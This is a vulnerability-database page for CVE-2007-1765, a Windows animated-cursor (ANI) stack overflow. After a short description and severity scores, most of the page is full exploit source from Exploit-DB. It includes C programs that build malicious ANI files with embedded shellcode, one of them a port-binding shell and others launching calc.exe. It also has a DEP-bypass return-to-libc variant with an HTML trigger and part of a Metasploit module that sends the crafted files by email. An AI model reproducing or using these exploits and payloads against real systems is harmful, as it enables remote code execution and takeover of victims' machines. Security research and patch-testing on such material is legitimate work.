CVE-2007-1765 Detail

CVE-2007-1765

EPSS

9.4%V3

Vector

Network

Published

2007-03-29
22h00 +00:00

Modified

2018-10-16
12h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a malformed ANI file, which results in memory corruption when processing cursors, animated cursors, and icons, a similar issue to CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this issue might be a duplicate of CVE-2007-0038; if so, then use CVE-2007-0038 instead of this identifier.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE Other	No informations.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	9.3		AV:N/AC:M/Au:N/C:C/I:C/A:C	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 3684

Publication date : 2007-04-07 22h00 +00:00
Author : Marsu
EDB Verified : Yes

/**************************************************************************** * MS Windows Explorer Unspecified .ANI File DoS * * * * * * Another .Ani bug that freezes Explorer if you open a folder that contains * * a crafted file. * * * * Tested against Win XP SP2 FR. * * Have Fun! * * * * Coded by Marsu <Marsupilamipowa@hotmail.fr> * ****************************************************************************/ #include "stdio.h" #include "stdlib.h" unsigned char Ani_headers[] = "\x52\x49\x46\x46\x08\x4d\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68" "\x24\x00\x00\x00\x24\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00" "\x0a\x00\x00\x00\x01\x00\x00\x00\x72\x61\x74\x65\x18\x00\x00\x00" "\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00" "\x03\x00\x00\x00\x03\x00\x00\x00\x4c\x49\x53\x54\xa8\x4c\x00\x00" "\x66\x72\x61\x6d\x69\x63\x6f\x6e\xbe\x0c\x00\x00\x00\x00\x02\x00" "\x01\x00\x20\x20\x00\x57\x57\x57\x57\x00\xa8\x0c\x00\x00\x16\x00" "\x00\x00\x03" //Change this last char to avoid crash ; int main(int argc, char* argv[]) { FILE* anifile; char evilbuff[4000]; printf("[+] MS Windows Explorer Unspecified .ANI File DoS\n"); printf("[+] Coded by Marsu <Marsupilamipowa@hotmail.fr>\n"); if (argc!=2) { printf("[+] Usage: %s <file.ani>\n",argv[0]); return 0; } memset(evilbuff,'A',4000); memcpy(evilbuff,Ani_headers,sizeof(Ani_headers)-1); if ((anifile=fopen(argv[1],"wb"))==0) { printf("[-] Unable to access file.\n"); return 0; } fwrite( evilbuff, 1, 4000, anifile ); fclose(anifile); printf("[+] Done. Have fun!\n"); return 0; } // milw0rm.com [2007-04-08]

Exploit Database EDB-ID : 3647

Publication date : 2007-04-01 22h00 +00:00
Author : Marsu
EDB Verified : Yes

/*************************************************************************** * MS Windows .ANI File Local Buffer Overflow * * * * * * Credits go to Trirat Puttaraksa cause his PoC inspired this source. * * devcode's exploit didnt work for me, so I made my own. * * This exploit launches calc.exe on a lot of app (Word, Winamp, etc...). * * * Turn off DEP to get it work on Explorer. * * * * Tested against Win XP SP2 FR. * * Have Fun! * * * * Coded by Marsu <Marsupilamipowa@hotmail.fr> * ***************************************************************************/ #include "stdio.h" #include "stdlib.h" /* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char CalcShellcode[] = "\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26" "\x45\x32\xe3\x83\xeb\xfc\xe2\xf4\xda\xad\x76\xe3\x26\x45\xb9\xa6" "\x1a\xce\x4e\xe6\x5e\x44\xdd\x68\x69\x5d\xb9\xbc\x06\x44\xd9\xaa" "\xad\x71\xb9\xe2\xc8\x74\xf2\x7a\x8a\xc1\xf2\x97\x21\x84\xf8\xee" "\x27\x87\xd9\x17\x1d\x11\x16\xe7\x53\xa0\xb9\xbc\x02\x44\xd9\x85" "\xad\x49\x79\x68\x79\x59\x33\x08\xad\x59\xb9\xe2\xcd\xcc\x6e\xc7" "\x22\x86\x03\x23\x42\xce\x72\xd3\xa3\x85\x4a\xef\xad\x05\x3e\x68" "\x56\x59\x9f\x68\x4e\x4d\xd9\xea\xad\xc5\x82\xe3\x26\x45\xb9\x8b" "\x1a\x1a\x03\x15\x46\x13\xbb\x1b\xa5\x85\x49\xb3\x4e\x3b\xea\x01" "\x55\x2d\xaa\x1d\xac\x4b\x65\x1c\xc1\x26\x53\x8f\x45\x6b\x57\x9b" "\x43\x45\x32\xe3"; unsigned char Ani_headers[] = "\x52\x49\x46\x46\x13\x03\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68" "\x24\x00\x00\x00\x24\x00\x00\x00\xff\xff\x00\x00\x09\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x04\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4c\x03\x00\x00\x00" "\x00\x00\x00\x00\x54\x53\x49\x4c\x04\x00\x00\x00\x02\x02\x02\x02" "\x61\x6e\x69\x68\xff\xff\x00\x00"; int main(int argc, char* argv[]) { FILE* anifile; char evilbuff[66000]; printf("[+] MS Windows .ANI File Buffer Overflow \n"); printf("[+] Greetz to Trirat Puttaraksa\n"); printf("[+] Coded by Marsu <Marsupilamipowa@hotmail.fr>\n"); if (argc!=2) { printf("[+] Usage: %s <file.ani>\n",argv[0]); return 0; } memset(evilbuff,'C',66000); memcpy(evilbuff,Ani_headers,sizeof(Ani_headers)-1); memcpy(evilbuff+168,"\x7b\x1a\x80\x7c",4); /* CALL ESI in Kernel32.dll */ memcpy(evilbuff+245,CalcShellcode,strlen(CalcShellcode)); memset(evilbuff+65623,0,1); if ((anifile=fopen(argv[1],"wb"))==0) { printf("[-] Unable to access file.\n"); return 0; } fwrite( evilbuff, 1, 65623, anifile ); fclose(anifile); printf("[+] Done. Have fun!\n"); return 0; } // milw0rm.com [2007-04-02]

Exploit Database EDB-ID : 3695

Publication date : 2007-04-08 22h00 +00:00
Author : Breno Silva Pinto
EDB Verified : Yes

/* .ANI exploit tested on Windows XP SP2 - Portuguese Shellcode port bind 13579 JMP ESP Addr - ntdll.dll Greetz: Marsu, Devcode, Str0ke, Dave, Sekure.org guys, Sauna. Exploit coded listen sauna hits Featuring Luiz Zanardo's gigs "Minoide - \x52\x49\x46\x46\x00\x04\x00\x41" @ www.myspace.com/fuzzyproject Breno Silva Pinto bsilva[at]Sekure.org */ #include <stdio.h> #include <stdlib.h> #include <windows.h> unsigned char aniheader[] = "\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68" "\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00" "\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02" "\x61\x6E\x69\x68\xA8\x03\x00\x00"; unsigned char Shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x29\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8f" "\x35\x37\x85\x83\xeb\xfc\xe2\xf4\x73\x5f\xdc\xca\x67\xcc\xc8\x7a" "\x70\x55\xbc\xe9\xab\x11\xbc\xc0\xb3\xbe\x4b\x80\xf7\x34\xd8\x0e" "\xc0\x2d\xbc\xda\xaf\x34\xdc\x66\xbf\x7c\xbc\xb1\x04\x34\xd9\xb4" "\x4f\xac\x9b\x01\x4f\x41\x30\x44\x45\x38\x36\x47\x64\xc1\x0c\xd1" "\xab\x1d\x42\x66\x04\x6a\x13\x84\x64\x53\xbc\x89\xc4\xbe\x68\x99" "\x8e\xde\x34\xa9\x04\xbc\x5b\xa1\x93\x54\xf4\xb4\x4f\x51\xbc\xc5" "\xbf\xbe\x77\x89\x04\x45\x2b\x28\x04\x75\x3f\xdb\xe7\xbb\x79\x8b" "\x63\x65\xc8\x53\xbe\xee\x51\xd6\xe9\x5d\x04\xb7\xe7\x42\x44\xb7" "\xd0\x61\xc8\x55\xe7\xfe\xda\x79\xb4\x65\xc8\x53\xd0\xbc\xd2\xe3" "\x0e\xd8\x3f\x87\xda\x5f\x35\x7a\x5f\x5d\xee\x8c\x7a\x98\x60\x7a" "\x59\x66\x64\xd6\xdc\x66\x74\xd6\xcc\x66\xc8\x55\xe9\x5d\x02\x8e" "\xe9\x66\xbe\x64\x1a\x5d\x93\x9f\xff\xf2\x60\x7a\x59\x5f\x27\xd4" "\xda\xca\xe7\xed\x2b\x98\x19\x6c\xd8\xca\xe1\xd6\xda\xca\xe7\xed" "\x6a\x7c\xb1\xcc\xd8\xca\xe1\xd5\xdb\x61\x62\x7a\x5f\xa6\x5f\x62" "\xf6\xf3\x4e\xd2\x70\xe3\x62\x7a\x5f\x53\x5d\xe1\xe9\x5d\x54\xe8" "\x06\xd0\x5d\xd5\xd6\x1c\xfb\x0c\x68\x5f\x73\x0c\x6d\x04\xf7\x76" "\x25\xcb\x75\xa8\x71\x77\x1b\x16\x02\x4f\x0f\x2e\x24\x9e\x5f\xf7" "\x71\x86\x21\x7a\xfa\x71\xc8\x53\xd4\x62\x65\xd4\xde\x64\x5d\x84" "\xde\x64\x62\xd4\x70\xe5\x5f\x28\x56\x30\xf9\xd6\x70\xe3\x5d\x7a" "\x70\x02\xc8\x55\x04\x62\xcb\x06\x4b\x51\xc8\x53\xdd\xca\xe7\xed" "\xf1\xed\xd5\xf6\xdc\xca\xe1\x7a\x5f\x35\x37\x85"; int main( int argc, char **argv ) { char Buffer[1024]; FILE *f; if ( argc < 2 ) { printf("usage %s <file.ani>\n",argv[0]); return 0; } memset( Buffer, 0x90, sizeof( Buffer ) ); memcpy( Buffer, aniheader, sizeof( aniheader ) - 1 ); memcpy( Buffer + 168, "\xed\x1e\x94\x7c", 4 ); // JMP ESP - NTDLL. Hey Dave ... this is for you brotha! memcpy( Buffer + 198, Shellcode, sizeof( Shellcode ) - 1 ); f = fopen( argv[1], "wb" ); if ( f == NULL ) { printf("Cannot create file\n"); return 0; } fwrite(Buffer, 1, 1024, f); fclose(f); printf(".ANI file created!\n"); return 0; } // milw0rm.com [2007-04-09]

Exploit Database EDB-ID : 3652

Publication date : 2007-04-02 22h00 +00:00
Author : devcode
EDB Verified : Yes

/* * version 0.5 * Copyright (c) 2007 devcode * * * ^^ D E V C O D E ^^ * * Windows .ANI LoadAniIcon Stack Overflow For Hardware DEP XP SP2 * [CVE-2007-1765] * * * Description: * A vulnerability has been identified in Microsoft Windows, * which could be exploited by remote attackers to take complete * control of an affected system. This issue is due to a stack overflow * error within the "LoadAniIcon()" [user32.dll] function when rendering * cursors, animated cursors or icons with a malformed header, which could * be exploited by remote attackers to execute arbitrary commands by * tricking a user into visiting a malicious web page or viewing an email * message containing a specially crafted ANI file. * * Hotfix/Patch: * None as of this time. * * Vulnerable systems: * Microsoft Windows 2000 Service Pack 4 * Microsoft Windows XP Service Pack 2 * Microsoft Windows XP 64-Bit Edition version 2003 (Itanium) * Microsoft Windows XP Professional x64 Edition * Microsoft Windows Server 2003 * Microsoft Windows Server 2003 (Itanium) * Microsoft Windows Server 2003 Service Pack 1 * Microsoft Windows Server 2003 Service Pack 1 (Itanium) * Microsoft Windows Server 2003 x64 Edition * Microsoft Windows Vista * * Microsoft Internet Explorer 6 * Microsoft Internet Explorer 7 * * Tested on: * Microsoft XP SP2 + DEP + Internet Explorer 6 * * This is a PoC and was created for educational purposes only. The * author is not held responsible if this PoC does not work or is * used for any other purposes than the one stated above. * * Credit goes to HOD (if he/they exist :P) for the html. Works on * XP SP2 with Hardware DEP enabled, go figure. * * ^^ shoutz to Wonk(if he exists r0fl), InTeL, thrasher :) * * */ #include <iostream> #include <windows.h> /* ANI Header */ unsigned char uszAniHeader[] = "\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68" "\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00" "\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02" "\x61\x6E\x69\x68\xA8\x03\x00\x00"; /* system("calc.exe"); */ char szExecute[] = "logoff.exe\x00"; unsigned char uszHtml[] = "<html>" "Microsoft Windows .ANI LoadAniIcon Exploit" "<br>Copyright (c) 2007 devcode<br>" "<style>" \ "* {CURSOR: url(\"poc.ani\")}</style></head>" "</html>"; /* Usage: ani.exe 1*/ char szIntro[] = "\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n" "\t\t\tdevcode (c) 2007\n" "[+] Targets:\n" "\t(0) Kernel32.dll (ExitProcess)\n" "\t(1) Windows XP SP2 + DEP\n" "\t(2) Windows 2003 Server\n" "Usage: ani.exe <target>"; /* RET2LIBC attack */ typedef struct { const char *szTarget; /* kernel32.dll - set the proper stack frame LEA EBP, DWORD PTR SS:[ESP+10] SUB ESP, EAX PUSH EBX PUSH ESI PUSH EDI .... .... RETN */ unsigned char uszRet[5]; /* msvcrt.dll - system() */ unsigned char uszMsvcrtCall[5]; } TARGET; TARGET targets[] = { { "Kernel32.dll (ExitProcess)", "\x90\x90\x90\x90", "\x90\x90\x90\x90" }, { "Windows XP SP2", "\xD6\x24\x80\x7C", "\xC7\x93\xC2\x77" }, { "Windows 2003 Server", "\x0A\x17\xE4\x77", "\x10\x8C\xBB\x77" } }; int main( int argc, char **argv ) { char szBuffer[1024]; FILE *f; void *pExitProcess[4]; if ( argc < 2 ) { printf("%s\n", szIntro ); return 0; } if ( atoi( argv[1] ) == 0 ) { printf("[+] Getting ExitProcess address...\n"); *pExitProcess = GetProcAddress( GetModuleHandle( "kernel32.dll" ), "ExitProcess" ); if ( pExitProcess == NULL ) { printf("[-] Cannot get ExitProcess address\n"); return 0; } memcpy( targets[1].uszRet, pExitProcess, 4 ); } printf("[+] Creating ANI header...\n"); memset( szBuffer, 0x90, sizeof( szBuffer ) ); memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 ); printf("[+] Copying execution code...\n"); memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 ); memset( szBuffer + 136, 0, 4 ); memset( szBuffer + 204, 0, 4 ); szBuffer[136] = 0x6C; szBuffer[204] = 0x6C; memcpy( szBuffer + 196, targets[atoi(argv[1])].uszMsvcrtCall, 4 ); memcpy( szBuffer + 200, targets[atoi(argv[1])].uszMsvcrtCall, 4 ); memcpy( szBuffer + 240, szExecute, sizeof( szExecute ) - 1 ); f = fopen( "poc.ani", "wb" ); if ( f == NULL ) { printf("[-] Cannot create ani file\n"); return 0; } fwrite( szBuffer, 1, 1024, f ); fclose( f ); printf("[+] .ANI file succesfully created!\n"); f = fopen( "poc.html", "wb" ); if ( f == NULL ) { printf("[-] Cannot create html file\n"); return 0; } fwrite( uszHtml, 1, sizeof( uszHtml ), f ); fclose( f ); printf("[+] HTML file succesfully created!\n"); return 0; } // milw0rm.com [2007-04-03]

Exploit Database EDB-ID : 3617

Publication date : 2007-03-30 22h00 +00:00
Author : devcode
EDB Verified : Yes

/* * Copyright (c) 2007 devcode * * * ^^ D E V C O D E ^^ * * Windows .ANI LoadAniIcon Stack Overflow * [CVE-2007-1765] * * * Description: * A vulnerability has been identified in Microsoft Windows, * which could be exploited by remote attackers to take complete * control of an affected system. This issue is due to a stack overflow * error within the "LoadAniIcon()" [user32.dll] function when rendering * cursors, animated cursors or icons with a malformed header, which could * be exploited by remote attackers to execute arbitrary commands by * tricking a user into visiting a malicious web page or viewing an email * message containing a specially crafted ANI file. * * Hotfix/Patch: * None as of this time. * * Vulnerable systems: * Microsoft Windows 2000 Service Pack 4 * Microsoft Windows XP Service Pack 2 * Microsoft Windows XP 64-Bit Edition version 2003 (Itanium) * Microsoft Windows XP Professional x64 Edition * Microsoft Windows Server 2003 * Microsoft Windows Server 2003 (Itanium) * Microsoft Windows Server 2003 Service Pack 1 * Microsoft Windows Server 2003 Service Pack 1 (Itanium) * Microsoft Windows Server 2003 x64 Edition * Microsoft Windows Vista * * Microsoft Internet Explorer 6 * Microsoft Internet Explorer 7 * * This is a PoC and was created for educational purposes only. The * author is not held responsible if this PoC does not work or is * used for any other purposes than the one stated above. * * Notes: * For this to work on XP SP2 on explorer.exe, DEP has to be turned * off. * */ #include <iostream> #include <windows.h> /* ANI Header */ unsigned char uszAniHeader[] = "\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68" "\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00" "\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02" "\x61\x6E\x69\x68\xA8\x03\x00\x00"; /* Shellcode - metasploit exec calc.exe ^^ */ unsigned char uszShellcode[] = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42" "\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32" "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a" "\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c" "\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57" "\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50" "\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d" "\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f" "\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a" "\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76" "\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65" "\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78" "\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f" "\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65" "\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d" "\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31" "\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69" "\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61" "\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70" "\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42"; char szIntro[] = "\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n" "\t\t\tdevcode (c) 2007\n" "[+] Targets:\n" "\t(1) Windows XP SP2\n" "\t(2) Kernel32.dll (ExitProcess)\n" "\t(3) Windows 2K SP4\n\n" "Usage: ani.exe <target> <file>"; typedef struct { const char *szTarget; unsigned char uszRet[5]; } TARGET; TARGET targets[] = { { "Windows XP SP2", "\xC9\x29\xD4\x77" }, /* call esp */ { "Kernel32.dll (ExitProcess)", "\x90\x90\x90\x90" }, /* ExitProcess */ { "Windows 2K SP4", "\x29\x4C\xE1\x77" } }; int main( int argc, char **argv ) { char szBuffer[1024]; FILE *f; void *pExitProcess[4]; if ( argc < 3 ) { printf("%s\n", szIntro ); return 0; } if ( atoi( argv[1] ) == 1 ) { printf("[+] Getting ExitProcess address...\n"); *pExitProcess = GetProcAddress( GetModuleHandle( "kernel32.dll" ), "ExitProcess" ); if ( pExitProcess == NULL ) { printf("[-] Cannot get ExitProcess address\n"); return 0; } memcpy( targets[1].uszRet, pExitProcess, 4 ); } printf("[+] Creating ANI header...\n"); memset( szBuffer, 0x90, sizeof( szBuffer ) ); memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 ); printf("[+] Copying shellcode...\n"); memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 ); memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 ); f = fopen( argv[2], "wb" ); if ( f == NULL ) { printf("[-] Cannot create file\n"); return 0; } fwrite( szBuffer, 1, 1024, f ); fclose( f ); printf("[+] .ANI file succesfully created!\n"); return 0; } // milw0rm.com [2007-03-31]

Exploit Database EDB-ID : 16698

Publication date : 2010-09-19 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: ms07_017_ani_loadimage_chunksize.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # # This module sends email messages via smtp # include Msf::Exploit::Remote::SMTPDeliver def initialize(info = {}) super(update_info(info, 'Name' => 'Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)', 'Description' => %q{ This module exploits a buffer overflow vulnerability in the LoadAniIcon() function of USER32.dll. The flaw is triggered through Outlook Express by using the CURSOR style sheet directive to load a malicious .ANI file. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee. }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm', # First version 'skape', # Vista support ], 'Version' => '$Revision: 10394 $', 'References' => [ ['MSB', 'MS07-017'], ['CVE', '2007-0038'], ['CVE', '2007-1765'], ['OSVDB', '33629'], ['BID', '23194'], ['URL', 'http://www.microsoft.com/technet/security/advisory/935423.mspx'], ['URL', 'http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp'], ['URL', 'http://www.determina.com/security.research/vulnerabilities/ani-header.html'], ], 'Stance' => Msf::Exploit::Stance::Passive, 'DefaultOptions' => { # Cause internet explorer to exit after the code hits 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024 + (rand(1000)), 'MinNops' => 32, 'Compat' => { 'ConnectionType' => '-bind -find', }, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ # # Use multiple cursor URLs to try all targets. This can result in # multiple, sequential sessions # [ 'Automatic', {} ], # # The following targets use call [ebx+4], just like the original exploit # # Partial overwrite doesn't work for Outlook Express [ 'Windows XP SP2 user32.dll 5.1.2600.2622', { 'Ret' => 0x25ba, 'Len' => 2 }], # Should work for all English XP SP2 [ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }], # Supplied by Fabrice MOURRON <fab[at]revhosts.net> [ 'Windows XP SP2 userenv.dll French', { 'Ret' => 0x7699c81a }], # Should work for English XP SP0/SP1 [ 'Windows XP SP0/SP1 netui2.dll English', { 'Ret' => 0x71bd0205 }], # Should work for English 2000 SP0-SP4+ [ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }], # # Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start # of the RIFF chunk itself. The length field of the RIFF chunk # tag contains a short jump into an embedded riff chunk that # makes a long relative jump into the actual payload. # [ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2, # On Vista, the pages that contain the RIFF are read-only. # In-place decoders cannot be used. 'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw } } ], # # Supplied by ramon[at]risesecurity.org # # call [ebx+4] [ 'Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language', { 'Ret' => 0x25d0, 'Len' => 2 }], [ 'Windows XP SP2 user32.dll (5.1.2600.2180) English', { 'Ret' => 0x77d825d0 }], [ 'Windows XP SP2 userenv.dll Portuguese (Brazil)', { 'Ret' => 0x769dc81a }], # call [esi+4] [ 'Windows XP SP1a userenv.dll English', { 'Ret' => 0x75a758b1 }], [ 'Windows XP SP1a shell32.dll English', { 'Ret' => 0x77441a66 }] ], 'DisclosureDate' => 'Mar 28 2007', 'DefaultTarget' => 0)) end def autofilter false end def exploit exts = ['bmp', 'wav', 'png', 'zip', 'tar'] gext = exts[rand(exts.length)] name = rand_text_alpha(rand(10)+1) + ".#{gext}" anis = {} html = "<html><head><title>" + rand_text_alphanumeric(rand(128)+4) + "</title>" + "</head><body>" + rand_text_alphanumeric(rand(128)+1) mytargs = (target.name =~ /Automatic/) ? targets : [target] if target.name =~ /Automatic/ targets.each_index { |i| next if not targets[i].ret acid = generate_cid html << generate_div("cid:#{acid}") # Re-generate the payload, using the explicit target return if ((p = regenerate_payload(nil, nil, targets[i])) == nil) # Generate an ANI file for this target anis[acid] = generate_ani(p, targets[i]) } else acid = generate_cid html << generate_div("cid:#{acid}") # Re-generate the payload, using the explicit target return if ((p = regenerate_payload(nil, nil, target)) == nil) # Generate an ANI file for this target anis[acid] = generate_ani(p, target) end html << "</body></html>" msg = Rex::MIME::Message.new msg.mime_defaults msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1) msg.to = datastore['MAILTO'] msg.from = datastore['MAILFROM'] msg.add_part(Rex::Text.encode_base64(html, "\r\n"), "text/html", "base64", "inline") anis.each_pair do |cid,ani| part = msg.add_part_attachment(ani, cid + "." + gext) part.header.set("Content-ID", "<"+cid+">") end send_message(msg.to_s) print_status("Waiting for a payload session (backgrounding)...") end def generate_cid rand_text_alphanumeric(32)+'@'+rand_text_alphanumeric(8) end def generate_div(url) "<div style='" + generate_css_padding() + Rex::Text.to_rand_case("cursor") + generate_css_padding() + ":" + generate_css_padding() + Rex::Text.to_rand_case("url(") + generate_css_padding() + "\"#{url}\"" + generate_css_padding() + ");" + generate_css_padding() + "'>" + generate_padding() + "</div>" end def generate_ani(payload, target) # Build the first ANI header anih_a = [ 36, # DWORD cbSizeof rand(128)+16, # DWORD cFrames rand(1024)+1, # DWORD cSteps 0, # DWORD cx,cy (reserved - 0) 0, # DWORD cBitCount, cPlanes (reserved - 0) 0, 0, 0, # JIF jifRate 1 # DWORD flags ].pack('V9') anih_b = nil if (target.name =~ /Vista/) # Vista has ebp=80, eip=84 anih_b = rand_text(84) # Patch local variables and loop counters anih_b[68, 12] = [0].pack("V") * 3 else # XP/2K has ebp=76 and eip=80 anih_b = rand_text(80) # Patch local variables and loop counters anih_b[64, 12] = [0].pack("V") * 3 end # Overwrite the return with address of a "call ptr [ebx+4]" anih_b << [target.ret].pack('V')[0, target['Len'] ? target['Len'] : 4] # Begin the ANI chunk riff = "ACON" # Calculate the data offset for the trampoline chunk and add # the trampoline chunk if we're attacking Vista if target.name =~ /Vista/ trampoline_doffset = riff.length + 8 riff << generate_trampoline_riff_chunk end # Insert random RIFF chunks 0.upto(rand(128)+16) do |i| riff << generate_riff_chunk() end # Embed the first ANI header riff << "anih" + [anih_a.length].pack('V') + anih_a # Insert random RIFF chunks 0.upto(rand(128)+16) do |i| riff << generate_riff_chunk() end # Trigger the return address overwrite riff << "anih" + [anih_b.length].pack('V') + anih_b # If this is a Vista target, then we need to align the length of the # RIFF chunk so that the low order two bytes are equal to a jmp $+0x16 if target.name =~ /Vista/ plen = (riff.length & 0xffff0000) | 0x0eeb plen += 0x10000 if (plen - 8) < riff.length riff << generate_riff_chunk((plen - 8) - riff.length) # Replace the operand to the relative jump to point into the actual # payload itself which comes after the riff chunk riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 5].pack('V') end # Place the RIFF chunk in front and off we go ret = "RIFF" + [riff.length].pack('V') + riff # We copy the encoded payload to the stack because sometimes the RIFF # image is mapped in read-only pages. This would prevent in-place # decoders from working, and we can't have that. ret << Rex::Arch::X86.copy_to_stack(payload.encoded.length) # Place the real payload right after it. ret << payload.encoded ret end # 